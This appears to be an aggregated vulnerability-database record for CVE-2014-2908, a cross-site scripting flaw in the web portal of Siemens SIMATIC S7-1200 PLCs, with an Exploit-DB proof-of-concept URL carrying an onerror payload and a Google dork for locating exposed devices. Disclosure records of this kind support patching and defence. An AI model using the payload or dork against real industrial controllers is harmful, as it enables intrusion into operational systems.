ID

VAR-E-201805-0053


CVE

cve_id:CVE-2014-2908

Trust: 1.5

sources: PACKETSTORM: 147813 // EXPLOIT-DB: 44687

EDB ID

44687


TITLE

Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting - Linux webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 44687

DESCRIPTION

Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting. CVE-2014-2908 . webapps exploit for Linux platform

Trust: 0.6

sources: EXPLOIT-DB: 44687

AFFECTED PRODUCTS

vendor:siemensmodel:simatic s7-1200 cpuscope: - version: -

Trust: 2.1

sources: PACKETSTORM: 147813 // EXPLOIT-DB: 44687 // EDBNET: 97928

EXPLOIT

# Exploit Title: Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-22
# Exploit Author: t4rkd3vilz, Jameel Nabbo
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-1200 CPU family Versions: V2.X and V3.X.
# Tested on: Kali Linux
# CVE: CVE-2014-2908

http://TargetIp/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=
<http://targetip/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=>"><img
src=x onerror=prompt(1);>&Send=Filter

Trust: 1.0

sources: EXPLOIT-DB: 44687

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 44687

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 44687

TYPE

Cross-Site Scripting

Trust: 1.6

sources: EXPLOIT-DB: 44687 // EDBNET: 97928

TAGS

tag:exploit

Trust: 0.5

tag:xss

Trust: 0.5

sources: PACKETSTORM: 147813

CREDITS

t4rkd3vilz

Trust: 0.6

sources: EXPLOIT-DB: 44687

EXTERNAL IDS

db:EXPLOIT-DBid:44687

Trust: 1.6

db:NVDid:CVE-2014-2908

Trust: 1.5

db:EDBNETid:97928

Trust: 0.6

db:PACKETSTORMid:147813

Trust: 0.5

sources: PACKETSTORM: 147813 // EXPLOIT-DB: 44687 // EDBNET: 97928

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2014-2908

Trust: 1.5

url:https://www.exploit-db.com/exploits/44687/

Trust: 0.6

sources: PACKETSTORM: 147813 // EXPLOIT-DB: 44687 // EDBNET: 97928

SOURCES

db:PACKETSTORMid:147813
db:EXPLOIT-DBid:44687
db:EDBNETid:97928

LAST UPDATE DATE

2022-07-27T09:44:39.397000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:147813date:2018-05-22T14:02:22
db:EXPLOIT-DBid:44687date:2018-05-22T00:00:00
db:EDBNETid:97928date:2018-05-22T00:00:00